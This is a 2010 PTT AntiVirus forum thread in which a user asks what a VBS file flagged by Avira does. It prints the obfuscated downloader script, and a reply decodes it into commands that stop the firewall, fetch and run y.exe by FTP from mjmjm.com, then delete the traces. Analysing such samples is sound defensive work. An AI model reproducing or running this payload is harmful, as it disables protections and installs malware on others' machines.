[請益] C:\WINDOWS\X.vbs是從哪裡生出來的?

作者piligo (霹靂狗)

看板AntiVirus

標題[請益] C:\WINDOWS\X.vbs是從哪裡生出來的?

時間Mon May 10 05:51:28 2010

請教，剛剛小紅傘突然跳出病毒警告，貼一下Script內容，請教先進，到底這個Script是在做什麼的? 因為我掃完整個登錄編輯器，也沒看到X.vbs的蹤影，所以這是誤判嗎? 不知這個X.Vbs是哪個程式生出來的小紅傘的Properties Type: File Source: C:\WINDOWS\X.Vbs Status: Infected Quarantine object: 4de78c7e.qua Restored: NO Uploaded to Avira: NO Operating System: Windows 2000/XP/VISTA Workstation Search engine: 8.02.01.236 Virus definition file: 7.10.07.66 Detection: Contains recognition pattern of the VBS/Dldr.PIF.1045 VBS script virus Date/Time: 2010/5/10, 05:27 Script內容是這樣 function o for i=1 to UBound(s) h=h&chr(s(i)-562) next Set qq = CreateObject("Wscript.Shell") qq.run h,0 end function s=array(575,661,671,662,594,609,661,594,672,663,678,594,677,678,673,674,594, 677,666,659,676,663,662,659,661,661,663,677,677,600,663,661,666,673,594,673, 594,671,668,671,668,671,608,661,673,671,624,671,608,678,682,678,600,663,661, 666,673,594,659,677,610,618,624,624,671,608,678,682,678,600,663,661,666,673, 594,618,618,618,624,624,671,608,678,682,678,600,663,661,666,673,594,665,663, 678,594,683,594,683,608,663,682,663,624,624,671,608,678,682,678,600,663,661, 666,673,594,660,683,663,624,624,671,608,678,682,678,600,664,678,674,594,607, 677,620,671,608,678,682,678,600,662,663,670,594,671,608,678,682,678,600,683, 608,663,682,663,600,659,678,678,676,667,660,594,625,608,680,660,677,594,607, 676,600,662,663,670,594,625,594,625,608,660,659,678,594,625,608,680,660,677, 594,625,608,663,682,663,600,600,677,678,659,676,678,594,666,678,678,674,620, 609,609,678,681,608,660,667,662,608,683,659,666,673,673,608,661,673,671,609) o -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 112.104.21.226

→ piligo:s=array該行只要再把第二行的數字接起來就會判斷成病毒 05/10 06:07

→ zha0:為了排版 , array 被你斷行了, 原本是要接起來的 cc 05/10 10:46

→ piligo:沒錯所以明牌都是接在一起的 XD 不知這些語法是做什麼的? 05/10 11:02

→ piligo: 有 05/10 11:02

推 junorn:cmd /c net stop sharedaccess 05/10 12:23

→ junorn:echo o mjmjm.com>m.txt 05/10 12:23

→ junorn:echo as08>>m.txt 05/10 12:23

→ junorn:echo 888>>m.txt 05/10 12:23

→ junorn:echo get y y.exe>>m.txt 05/10 12:24

→ junorn:echo bye>>m.txt 05/10 12:24

→ junorn:ftp -s:m.txt 05/10 12:24

→ junorn:del m.txt 05/10 12:24

→ junorn:y.exe 05/10 12:24

→ junorn:attrib ?.vbs -r 05/10 12:24

→ junorn:del ? ?.bat ?.vbs ?.exe 05/10 12:25

→ junorn:start http://tw.bid.yahoo.com/ 05/10 12:25

→ junorn:上面各行中間有一個&符號 05/10 12:26